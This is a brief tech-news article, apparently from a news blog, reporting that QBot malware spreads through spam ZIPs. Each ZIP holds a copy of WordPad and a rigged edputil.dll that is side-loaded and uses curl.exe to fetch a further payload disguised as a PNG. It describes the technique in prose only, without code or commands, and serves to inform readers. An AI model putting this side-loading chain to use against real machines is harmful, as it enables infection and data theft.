The QBot malware exploits a WordPad-related vulnerability to infect Windows machines. The malicious code is installed after a manipulated DLL file is loaded. As usual, the software is distributed via spam email attachments.
Many Windows apps use DLL libraries that make functions available across programs. The files are loaded when the application starts. However, DLLs in the same folder are preferred before searching in system folders. WordPad requires the “edputil.dll” which is stored in the System32 directory.
According to Bleeping Computer, QBot operators are currently sending ZIP files containing a “document.exe” and an “edputil.dll”. The executable program is a copy of the legitimate WordPad application “write.exe”. However, the DLL is rigged and loaded when the tool starts instead of the legitimate library placed in the system directory since it is located in the same folder.
QBot picks up mail addresses and data
Once the library is loaded, the system application “curl.exe” is called to download another DLL disguised as a PNG image. The program is then executed, leaving QBot running in the background. The malware grabs email addresses for further phishing attacks and can install further toolkits on the PC. Hackers can use the infected PC to take over other devices on the network, intercept data or launch a ransomware attack.
With the installation via WordPad, the attackers hope that antivirus apps will not be able to detect the malicious code and warn the user. Since the download of the actual malware requires “curl.exe”, old computers are not affected. The tool can only be found in Windows 10 and 11.
It has been a long time since I joined Research Snipers. Though I have been working as a part-time tech-news writer, it feels good to be part of the team. Besides that, I am building a finance-based blog, working as a freelance content writer/blogger, and a video editor.